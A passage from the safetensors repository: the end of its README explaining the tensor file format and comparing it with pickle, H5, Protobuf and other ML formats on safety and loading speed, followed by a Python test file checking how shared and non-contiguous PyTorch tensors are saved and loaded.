absolute position in the file), 84 | with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`). 85 | - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings. 86 | - Rest of the file: byte-buffer. 87 | 88 | Notes: 89 | - Duplicate keys are disallowed. Not all parsers may respect this. 90 | - In general the subset of JSON is implicitly decided by `serde_json` for 91 | this library. Anything obscure might be modified at a later time, that odd ways 92 | to represent integer, newlines and escapes in utf-8 strings. This would only 93 | be done for safety concerns 94 | - Tensor values are not checked against, in particular NaN and +/-Inf could 95 | be in the file 96 | - Empty tensors (tensors with 1 dimension being 0) are allowed. 97 | They are not storing any data in the databuffer, yet retaining size in the header. 98 | They don't really bring a lot of values but are accepted since they are valid tensors 99 | from traditional tensor libraries perspective (torch, tensorflow, numpy, ..). 100 | - 0-rank Tensors (tensors with shape `[]`) are allowed, they are merely a scalar. 101 | - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents 102 | the creation of polyglot files. 103 | - Endianness: Little-endian. 104 | moment. 105 | - Order: 'C' or row-major. 106 | - Notes: Some smaller than 1 byte dtypes appeared, which make alignment tricky. Non traditional APIs might be required for those. 107 | 108 | 109 | ### Yet another format ? 110 | 111 | The main rationale for this crate is to remove the need to use 112 | `pickle` on `PyTorch` which is used by default. 113 | There are other formats out there used by machine learning and more general 114 | formats. 115 | 116 | 117 | Let's take a look at alternatives and why this format is deemed interesting. 118 | This is my very personal and probably biased view: 119 | 120 | | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 121 | | ----------------------- | --- | --- | --- | --- | --- | --- | --- | 122 | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | 123 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ | 124 | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 | 125 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 | 126 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 | 127 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ | 128 | | Arrow | ? | ? | ? | ? | ? | ? | ✗ | 129 | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ | 130 | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | 131 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 | 132 | 133 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code ? 134 | - Zero-copy: Does reading the file require more memory than the original file ? 135 | - Lazy loading: Can I inspect the file without loading everything ? And loading only 136 | some tensors in it without scanning the whole file (distributed setting) ? 137 | - Layout control: Lazy loading, is not necessarily enough since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important. 138 | - No file size limit: Is there a limit to the file size ? 139 | - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code ? (~ means we can store more than pure tensors, but no custom code) 140 | - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are 141 | necessary)? This is becoming increasingly important in the ML world. 142 | 143 | 144 | ### Main oppositions 145 | 146 | - Pickle: Unsafe, runs arbitrary code 147 | - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use after free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently. 148 | - SavedModel: Tensorflow specific (it contains TF graph information). 149 | - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting) 150 | - Protobuf: Hard 2Go max file size limit 151 | - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize). 152 | - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy. 153 | - Arrow: No `bfloat16` support. 154 | 155 | ### Notes 156 | 157 | - Zero-copy: No format is really zero-copy in ML, it needs to go from disk to RAM/GPU RAM (that takes time). On CPU, if the file is already in cache, then it can 158 | truly be zero-copy, whereas on GPU there is not such disk cache, so a copy is always required 159 | but you can bypass allocating all the tensors on CPU at any given point. 160 | SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserialization is <<< of the time required to load the actual tensor data and is readable I went that way, (also space is <<< to the tensor data). 161 | 162 | - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the 163 | moment. 164 | - Order: 'C' or row-major. This seems to have won. We can add that information later if needed. 165 | - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format. 166 | - Sub 1 bytes dtypes: Dtypes can now have lower than 1 byte size, this makes alignment&adressing tricky. For now, the library will simply error out whenever an operation triggers an non aligned read. Trickier API may be created later for those non standard ops. 167 | 168 | ### Benefits 169 | 170 | Since we can invent a new format we can propose additional benefits: 171 | 172 | - Prevent DOS attacks: We can craft the format in such a way that it's almost 173 | impossible to use malicious files to DOS attack a user. Currently, there's a limit 174 | on the size of the header of 100MB to prevent parsing extremely large JSON. 175 | Also when reading the file, there's a guarantee that addresses in the file 176 | do not overlap in any way, meaning when you're loading a file you should never 177 | exceed the size of the file in memory 178 | 179 | - Faster load: PyTorch seems to be the fastest file to load out in the major 180 | ML formats. However, it does seem to have an extra copy on CPU, which we 181 | can bypass in this lib by using `torch.UntypedStorage.from_file`. 182 | Currently, CPU loading times are extremely fast with this lib compared to pickle. 183 | GPU loading times are as fast or faster than PyTorch equivalent. 184 | Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems 185 | to be faster too somehow (similar behavior in torch pickle) 186 | 187 | - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to 188 | load only part of the tensors on the various models. For 189 | [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled 190 | to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s. 191 | This really speeds up feedbacks loops when developing on the model. For instance 192 | you don't have to have separate copies of the weights when changing the distribution 193 | strategy (for instance Pipeline Parallelism vs Tensor Parallelism). 194 | 195 | License: Apache-2.0 196 | -------------------------------------------------------------------------------- /bindings/python/tests/test_pt_model.py: -------------------------------------------------------------------------------- 1 | import copy 2 | import unittest 3 | 4 | import torch 5 | 6 | from safetensors import safe_open 7 | from safetensors.torch import ( 8 | _end_ptr, 9 | _find_shared_tensors, 10 | _is_complete, 11 | _remove_duplicate_names, 12 | load_model, 13 | save_file, 14 | save_model, 15 | ) 16 | 17 | 18 | class OnesModel(torch.nn.Module): 19 | def __init__(self): 20 | super().__init__() 21 | self.a = torch.nn.Linear(4, 4) 22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4))) 23 | self.a.bias = torch.nn.Parameter(torch.ones((4,))) 24 | self.b = self.a 25 | 26 | 27 | class Model(torch.nn.Module): 28 | def __init__(self): 29 | super().__init__() 30 | self.a = torch.nn.Linear(100, 100) 31 | self.b = self.a 32 | 33 | 34 | class NonContiguousModel(torch.nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = torch.nn.Linear(100, 100) 38 | A = torch.zeros((100, 100)) 39 | A = A.transpose(0, 1) 40 | self.a.weight = torch.nn.Parameter(A) 41 | 42 | 43 | class CopyModel(torch.nn.Module): 44 | def __init__(self): 45 | super().__init__() 46 | self.a = torch.nn.Linear(100, 100) 47 | self.b = copy.deepcopy(self.a) 48 | 49 | 50 | class NoSharedModel(torch.nn.Module): 51 | def __init__(self): 52 | super().__init__() 53 | self.a = torch.nn.Linear(100, 100) 54 | self.b = torch.nn.Linear(100, 100) 55 | 56 | 57 | class TorchModelTestCase(unittest.TestCase): 58 | def test_is_complete(self): 59 | A = torch.zeros((3, 3)) 60 | self.assertTrue(_is_complete(A)) 61 | 62 | B = A[:1, :] 63 | self.assertFalse(_is_complete(B)) 64 | 65 | # Covers the whole storage but with holes 66 | C = A[::2, :] 67 | self.assertFalse(_is_complete(C)) 68 | 69 | D = torch.zeros((2, 2), device=torch.device("meta")) 70 | self.assertTrue(_is_complete(D)) 71 | 72 | def test_find_shared_tensors(self): 73 | A = torch.zeros((3, 3)) 74 | B = A[:1, :] 75 | 76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}]) 77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}]) 78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}]) 79 | 80 | C = torch.zeros((2, 2), device=torch.device("meta")) 81 | D = C[:1] 82 | # Meta device is not shared 83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), []) 84 | self.assertEqual(_find_shared_tensors({"C": C}), []) 85 | self.assertEqual(_find_shared_tensors({"D": D}), []) 86 | 87 | def test_find_shared_non_shared_tensors(self): 88 | A = torch.zeros((4,)) 89 | B = A[:2] 90 | C = A[2:] 91 | # Shared storage but do not overlap 92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}]) 93 | 94 | B = A[:2] 95 | C = A[1:] 96 | # Shared storage but *do* overlap 97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}]) 98 | 99 | B = A[:2] 100 | C = A[2:] 101 | D = A[:1] 102 | # Shared storage but *do* overlap 103 | self.assertEqual( 104 | _find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}] 105 | ) 106 | 107 | def test_end_ptr(self): 108 | A = torch.zeros((4,)) 109 | start = A.data_ptr() 110 | end = _end_ptr(A) 111 | self.assertEqual(end - start, 16) 112 | B = torch.zeros((16,)) 113 | A = B[::4] 114 | start = A.data_ptr() 115 | end = _end_ptr(A) 116 | # Jump 3 times 16 byes (the stride of B) 117 | # Then add the size of the datapoint 4 bytes 118 | self.assertEqual(end - start, 16 * 3 + 4) 119 | 120 | # FLOAT16 121 | A = torch.zeros((4,), dtype=torch.float16) 122 | start = A.data_ptr() 123 | end = _end_ptr(A) 124 | self.assertEqual(end - start, 8) 125 | B = torch.zeros((16,), dtype=torch.float16) 126 | A = B[::4] 127 | start = A.data_ptr() 128 | end = _end_ptr(A) 129 | # Jump 3 times 8 bytes (the stride of B) 130 | # Then add the size of the datapoint 4 bytes 131 | self.assertEqual(end - start, 8 * 3 + 2) 132 | 133 | def test_remove_duplicate_names(self): 134 | A = torch.zeros((3, 3)) 135 | B = A[:1, :] 136 | 137 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]}) 138 | self.assertEqual( 139 | _remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]} 140 | ) 141 | with self.assertRaises(RuntimeError): 142 | self.assertEqual(_remove_duplicate_names({"B": B}), []) 143 | 144 | def test_failure(self): 145 | model = Model() 146 | with self.assertRaises(RuntimeError): 147 | save_file(model.state_dict(), "tmp.safetensors") 148 | 149 | # def test_workaround_refuse(self): 150 | # model = Model() 151 | # A = torch.zeros((1000, 10)) 152 | # a = A[:100, :] 153 | # model.a.weight = torch.nn.Parameter(a) 154 | # with self.assertRaises(RuntimeError) as ctx: 155 | # save_model(model, "tmp4.safetensors") 156 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception)) 157 | 158 | def test_save(self): 159 | # Just testing the actual saved file to make sure we're ok on big endian 160 | model = OnesModel() 161 | save_model(model, "tmp_ones.safetensors") 162 | with safe_open("tmp_ones.safetensors", framework="pt") as f: 163 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) 164 | 165 | # 192 hardcoded to skip the header, metadata order is random. 166 | self.assertEqual( 167 | open("tmp_ones.safetensors", "rb").read()[192:], 168 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""", 169 | ) 170 | 171 | model2 = OnesModel() 172 | load_model(model2, "tmp_ones.safetensors") 173 | 174 | state_dict = model.state_dict() 175 | for k, v in model2.state_dict().items(): 176 | torch.testing.assert_close(v, state_dict[k]) 177 | 178 | def test_workaround(self): 179 | model = Model() 180 | save_model(model, "tmp.safetensors") 181 | with safe_open("tmp.safetensors", framework="pt") as f: 182 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) 183 | 184 | model2 = Model() 185 | load_model(model2, "tmp.safetensors") 186 | 187 | state_dict = model.state_dict() 188 | for k, v in model2.state_dict().items(): 189 | torch.testing.assert_close(v, state_dict[k]) 190 | 191 | def test_workaround_works_with_different_on_file_names(self): 192 | model = Model() 193 | state_dict = model.state_dict() 194 | state_dict.pop("a.weight") 195 | state_dict.pop("a.bias") 196 | save_file(state_dict, "tmp.safetensors") 197 | 198 | model2 = Model() 199 | load_model(model2, "tmp.safetensors") 200 | 201 | state_dict = model.state_dict() 202 | for k, v in model2.state_dict().items(): 203 | torch.testing.assert_close(v, state_dict[k]) 204 | 205 | def test_workaround_non_contiguous(self): 206 | model = NonContiguousModel() 207 | 208 | with self.assertRaises(ValueError) as ctx: 209 | save_model(model, "tmp_c.safetensors", force_contiguous=False) 210 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception)) 211 | save_model(model, "tmp_c.safetensors", force_contiguous=True) 212 | 213 | model2 = NonContiguousModel() 214 | load_model(model2, "tmp_c.safetensors") 215 | 216 | state_dict = model.state_dict() 217 | for k, v in model2.state_dict().items(): 218 | torch.testing.assert_close(v, state_dict[k]) 219 | 220 | def test_workaround_copy(self): 221 | model = CopyModel() 222 | self.assertEqual( 223 | _find_shared_tensors(model.state_dict()), 224 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}], 225 | ) 226 | save_model(model, "tmp.safetensors") 227 | 228 | model2 = CopyModel() 229 | load_model(model2, "tmp.safetensors") 230 | 231 | state_dict = model.state_dict() 232 | for k, v in model2.state_dict().items(): 233 | torch.testing.assert_close(v, state_dict[k]) 234 | 235 | def test_difference_with_torch(self): 236 | model = Model() 237 | torch.save(model.state_dict(), "tmp2.bin") 238 | 239 | model2 = NoSharedModel() 240 | # This passes on torch. 241 | # The tensors are shared on disk, they are *not* shared within the model 242 | # The model happily loads the tensors, and ends up *not* sharing the tensors by. 243 | # doing copies 244 | self.assertEqual( 245 | _find_shared_tensors(model2.state_dict()), 246 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}], 247 | ) 248 | model2.load_state_dict(torch.load("tmp2.bin")) 249 | self.assertEqual( 250 | _find_shared_tensors(model2.state_dict()), 251 | [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}], 252 | ) 253 | 254 | # However safetensors cannot save those, so we cannot 255 | # reload the saved file with the different model 256 | save_model(model, "tmp2.safetensors") 257 | with self.assertRaises(RuntimeError) as ctx: 258 | load_model(model2, "tmp2.safetensors") 259 | self.assertIn( 260 | """Missing key(s) in state_dict: "b.bias", "b.weight""", str(ctx.exception) 261 | ) 262 | 263 | def test_difference_torch_odd(self): 264 | model = NoSharedModel() 265 | a = model.a.weight 266 | b = model.b.weight 267 | self.assertNotEqual(a.data_ptr(), b.data_ptr()) 268 | torch.save(model.state_dict(), "tmp3.bin") 269 | 270 | model2 = Model() 271 | self.assertEqual( 272 | _find_shared_tensors(model2.state_dict()), 273 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}], 274 | ) 275 | # Torch will affect either `b` or `a` to the shared tensor in the `model2` 276 | model2.load_state_dict(torch.load("tmp3.bin")) 277 | 278 | # XXX: model2 uses only the B weight not the A weight anymore. 279 | self.assertFalse(torch.allclose(model2.a.weight, model.a.weight)) 280 | torch.testing.assert_close(model2.a.weight, model.b.weight) 281 | self.assertEqual( 282 | _find_shared_tensors(model2.state_dict()), 283 | [{"a.weight", "b.weight"}, {"b.bias", "a.bias"}], 284 | ) 285 | 286 | # Everything is saved as-is 287 | save_model(model, "tmp3.safetensors") 288 | # safetensors will yell that there were 2 tensors on disk, while 289 | # the models expects only 1 tensor since both are shared. 290 | with self.assertRaises(RuntimeError) as ctx: 291 | load_model(model2, "tmp3.safetensors") 292 | # Safetensors properly warns the user that some ke 293 | self.assertIn( 294 | """Unexpected key(s) in state_dict: "b.bias", "b.weight""", 295 | str(ctx.exception), 296 | ) 297 | --------------------------------------------------------------------------------